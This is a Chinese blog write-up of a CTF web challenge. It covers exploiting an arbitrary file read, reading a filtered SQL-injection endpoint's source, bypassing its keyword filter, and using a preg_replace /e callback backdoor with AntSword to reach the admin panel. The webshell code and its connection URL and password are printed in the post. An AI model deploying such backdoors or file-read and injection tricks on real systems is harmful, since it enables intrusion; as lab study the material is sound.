CG-综合题2

最新推荐文章于 2022-03-21 15:41:02 发布
最新推荐文章于 2022-03-21 15:41:02 发布
阅读量265 收藏
点赞数
分类专栏: SQL注入 文章标签: cg
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45552960/article/details/103246296
版权

首先看到题目
在这里插入图片描述
我第一下看到了QQ和一串微信号以为是可用信息,结果花了点时间去解码,结果啥可用信息都是都没有,看到首页和尾页,点击尾页可以看到url发生了变化,
在这里插入图片描述
随意输入一个id值
在这里插入图片描述
可以看到,有一个so.php,我们后面会用到这个php文件
在这里插入图片描述
然后往下继续看,可以看到一个留言板,随意输入,观察url
在这里插入图片描述
在这里插入图片描述
有一个确认提交按钮,和下方有一串提示,哈哈作者也不会 xss,排除了这题是xss的坑,我们点击确认提交
在这里插入图片描述
出现了变化,url变成了这样,到这里我们还是没有什么思路,返回我们继续收集可用信息,看到如下信息
在这里插入图片描述
点击试试,看看有啥新大陆发现,
在这里插入图片描述
果然新大陆就在这里,看到url,这里我们可以轻松联想到任意文件读取漏洞,于是我们构造如下payload,可以看到出现了一大串信息,但是发信这些信息不是我们想要的信息
在这里插入图片描述
在这里插入图片描述
于是看到file前面有一个about.php,于是就试一下看看能不能读取到这个文件的有用信息
在这里插入图片描述
结果有了,然后我们进行代码格式化

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
$file=$_GET['file'];
if($file=="" || strstr($file,'config.php')){
	echo "file参数不能为空!";
	exit();
}else{
	$cut=strchr($file,"loginxlcteam");
	if($cut==false){
	$data=file_get_contents($file);
	$date=htmlspecialchars($data);
	echo $date;
	}else{
		echo "<script>alert('敏感目录,禁止查看!但是。。。')</script>";
	}
}

发现有一个config.php和loginxlcteam,于是我们试试看这个loginxlcteam,发现这是一个后台登录的界面
在这里插入图片描述
因为之前不是提到只有本公司开发的浏览器才能用嘛,
在这里插入图片描述
于是我们就是试一下读取一下so.php的内容,
在这里插入图片描述
我们好像又发现了新大陆,对代码格式化一下

<?php
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){
echo '万恶滴黑阔,本功能只有用本公司开发的浏览器才可以用喔~';
    exit();
}
$id=$_POST['soid'];
include 'config.php';
include 'antiinject.php';
include 'antixss.php';
$id=antiinject($id);
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
mysql_select_db($db_name,$con);
$id=mysql_real_escape_string($id);
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result);
echo htmlspecialchars($rs['nice']).':<br />&nbsp;&nbsp;&nbsp;&nbsp;'.antixss($rs['say']).'<br />';
mysql_free_result($result);
mysql_free_result($file);
mysql_close($con);
?>

通过代码发现当'HTTP_USER_AGENT']=="Xlcteam Browser"才会执行下一步操作。根据so.php的源代码中我们还发现了,防止sql注入的文件antiinject.php,然后基本已经可以确定是sql注入了,于是我们就读取一下antiinject.php的源码看看
在这里插入图片描述

<?php
function antiinject($content) {
    $keyword = array("select", "union", "and", "from", ' ', "'", ";", '"', "char", "or", "count", "master", "name", "pass", "admin", "+", "-", "order", "=");
    $info = strtolower($content);
    for ($i = 0;$i <= count($keyword);$i++) {
        $info = str_replace($keyword[$i], '', $info);
    }
    return $info;
}
?>

发现它过滤了很多的字符,但只是替换成空了,我们有很多的绕过方法可以去绕过他,可以大写双写,我看前几个博主都是双写绕过,到这里的话,我引用一下大佬写的
在这里插入图片描述
在这里插入图片描述

fuckruntu

在这里插入图片描述

    <?php
    $e = $_REQUEST['www'];
    $arr = array($_POST['wtf'] => '|.*|e',);
    array_walk($arr, $e, '');
    ?>

但是就是很奇怪的是我绕过了浏览器啥都不给我回显,有毒emmm~~
用了前几个大佬的方法也是不给回显,cao 那我 只能怪到电脑身上了 破电脑!!!
到这里可以直接用蚁剑,直接拿到管理后台

url : http://cms.nuptzj.cn/xlcteam.php?www=preg_replace
pass : wtf

还可以
在这里插入图片描述
然后用print_r函数查看一下目录下有哪些文件
在这里插入图片描述
这里最后一串是乱码,在浏览器里设置一下文字编码格式为unicode即可
,最后访问可得flag,谷歌的话可以用charset这个插件来编码啦
在这里插入图片描述
在这里插入图片描述
总体来说还是学到了挺多东西吧emm,加油鸭~

小 白 渣
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CG CTF 综合题
qq_46389295的博客
02-23 679
题目链接 打开界面,emm…JSFuck 丢到解析器里边跑 访问 1bc29b36f623ba82aaf6724fd3b16718.php 重新访问拿brupsuite抓一下包 .bash_history 记录Linux输入命令 可以尝试访问这个文件 访问flagbak.zip,下载文件可得flag nctf{bash_history_means_what} ...
CG-CTF 综合题2(sql注入绕过、注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5785
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
南邮CTF综合题2脚本
07-11
南京邮电大学网络攻防平台综合题2脚本,可以直接跑出所需的数据。
CGCTF-综合题2-writeup
test
10-26 2501
前言 tips : 没有提示 链接 我个人认为这个题目非常的好,这道题虽然花了很长的时候,但是收获也很大。所以不放在writeup集合中,单独拿出来写了一篇。我写的CGCTF关于web的writeup请移步,点击这里。 正文 首先访问题目,发现好像挺正常的,没有发现什么提示。所以第一步做一个简单信息收集。 已知可能有价值的url http://cms.nuptzj.cn/ 首页 htt...
CG CTF-Web-综合题2
feng的博客
09-08 784
前言 这道题主要涉及了文件包含、代码审计、SQL注入、回调后门等内容。 这道题是CG CTF里面出的比较好的一个题目了,对于我这样的萌新来说,虽然不能独立做出来,但是看了WP之后真的学到了很多东西,也知道了自己欠缺的在哪里。 WP 打开环境,看到是Xlcteam客户留言板。我们先随便看看。留言搜索框那里输入后是这样: 有经验的师傅其实已经猜到可能是对HTTP请求头里面的某些内容进行比较,这里应该可以伪造http请求头来绕过。 留言那里随便输点东西,看到XSS应该不行。 这里说查看网页源码有惊喜,但是我
CG-CTF web之 综合题_1
silence1_的博客
05-14 803
CG-CTF web__综合题_1 题目: 题目名字就是综合题,题目链接 进入看到一大串字符, 这是JSFuck,直接复制到控制台,回车,即可执行其代码 这里回车后显示一个php文件 访问它,得到下一个信息,提示tip在脑袋里,就应该是在响应头里 查看响应头,看到tip:history of bash 这里提示history of bash ,想到linux中使用过linux命令,会生成一个.b...
CG-CTF web刷题记录
qq_45130960的博客
11-17 1339
这里刚入门ctf小白一枚 如果有什么地方说错了或者有待改进的地方欢迎指出(-w-) 1.签到题 KEY在哪里? 在网页源码里~fn+F12查看网页源码收获flag一枚 2.签到2 打开题目我们看到题目让给我们输入口令:zhimakaimen 可是输入了之后依然报错呢F12看一下网页源代码 在maxlength处限制了我们输入字符的长度 我们将它改成11 重新输入 “zhimakaimen” ...
中考相似三角形经典综合题(学生版).doc
09-19
- 题目6中,点G为DF的中点,结合正方形性质可以证明EG=CG。 6. **抛物线与相似三角形**: - 题目7要求找抛物线上满足条件的点P,使得以A,P,M为顶点的三角形与相似,需要用到抛物线的解析式和相似三角形的比例...
一次函数和几何图形综合题10与答案解析.doc
09-28
1. 题目要求求解AC的解析式,已知直线y=-x+2与x轴、y轴的交点,可以得出A(-2, 0),B(0, 2)。由于OC=OB,C在y轴负半轴上,C(0, -2)。由AC两点坐标可得AC的解析式为y=x-2。接着探究BP与PQ的数量关系,当P在OA延长线上...
第十届蓝桥杯大赛决赛真题-c赛道和JAVA赛道所有真题
03-19
"CG卷"和"JG卷"可能是C语言和Java语言混合的综合卷,旨在测试参赛者的跨语言理解和应用能力。这类题目可能会要求参赛者在两种语言之间进行切换,解决特定的问题,以此检验他们的编程灵活性。 对于学习和准备蓝桥杯...
南邮CTF综合题2
mylyylmy的博客
08-01 3205
南邮CTF综合题2----小白的第一篇 在自己加别人的WP的帮助下终于完成了这道十分有价值的CTF题目 首先我们看到题目的主体界面 其他的都没有意义,我们首先看到的是输入框,很自然的就想到XSS或者SQL,但是发表留言之后弹出非XSS的弹框,这就意味着这道题很大可能是SQL注入 我们先看留言搜索输入1后 这需要修改USER-AGENT但是我们并不知道这个可以通过验证的USER-A...
CG CTF WEB 综合题2
无限迭代中......
07-05 1154
http://cms.nuptzj.cn/ 题解: MzAzMTY3YWQxZDlmZmUyNGIxOWNjZWI1OWY4NzA3ZmU= base64解密 303167ad1d9ffe24b19cceb59f8707fe md5解密 undefined 能点的都点一遍以后 CMS说明的URL http://cms.nuptzj.cn/about.ph...
CG系统编程练习题
热门推荐
www.helloworld.com
10-21 1万+
目录 日历问题 成绩大排队 最少钱币数 写出来吧 字符串数字置换 到底买不买 选美比赛 数码管 挖掘机技术哪家强 多项式加法 恺撒Caesar密码 在霍格沃茨找零钱 拼写检查 蛇行矩阵 公交系统 部分A+B 数塔 小丑排序 绩点计算 金币 亲和数 数的距离差 小希的数表 最简单的计算机 个位数统计 相同生日 锤子剪刀布 7, 还是7 点球大...
湖南大学CG题库(数据结构与算法)题解
01解题者~博客
03-21 5288
前言:湖南大学2022数据结构与算法课程答案 目录:实验一:预测线性表的实现1、基于链表的线性表实现(题解)题目描述:题解:反思: 实验一:预测线性表的实现 1、基于链表的线性表实现(题解) 题目描述: 题解: #include<bits/stdc++.h> using namespace std; //断言工具函数:如果val为假则输出s然后中断程序 void Assert(bool val,string s){ if(!val){
看雪CTF 2016_第四题分析
09-06 394
结合前辈们的分析,自己再作一个分析,算是当做学习笔记吧! OD 下GetDlgItemTextA 这个断点 0040148C |. 83F8 1E cmp eax,0x1E 检测注册码长度是否为30位 0040148F |. 75 25 jnz short CrackMe.004014B6 00401491 |. 8BD0 mov edx,eax 0...
python CG练习题
天天向上
03-09 463
输入方式 a, b, c = map(float, input().split()) alist = list(map(int, input().split())) n = int(input()) #数组 for i in range(n): Y[i] = int( input() ) import numpy A=numpy.array(list(map(int, in...
CG CTF WEB 起名字真难
无限迭代中......
07-04 833
http://chinalover.sinaapp.com/web12/index.php 题意:输入key,key的值需要等于54975581388,但是key的每一位数字不能是1-9 题解: 原理:php的弱类型的特性 <?php function noother_says_correct($number) { $one = ord('1'); $n...
Cg使用说明 第一章 介绍
tianyu2202的专栏
06-08 1239
原创内容,欢迎转载,转载请注明出处:http://blog.csdn.net/tianyu2202/   Cg使用说明 第一章介绍 本章有以下四个部分: “什么是Cg?”介绍Cg编程语言 “顶点、片段和图形管线”描述现代显示硬件的数据流,以及Cg如何与之融为一体的使用 “Cg开发历史”讲述Cg开发的背景 “Cg开发环境”介绍如何使用Cg对现存的3D图形API进行开发
南京邮电CTF 后面的几个WEB题目 By Assassinh
Assassin
08-10 1382
之前做的南邮的题目,但是一直遗留下来几个比较复杂一些的,但是前面还是有很有意思的题目,补题补题sql injection 4F12打开源码,关键代码如下#GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php';function clean($str){ if(get_magic_quot
XCZU2CG-ISFVC784E
最新发布
06-24
XCZU2CG- ISFVC784E是一个由Xilinx公司生产的FPGA(Field-Programmable Gate Array)器件型号。它属于Kintex UltraScale+系列,这是一种高级的可编程逻辑器件,用于实现高性能和高密度的应用。ISFVC784E具体参数可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值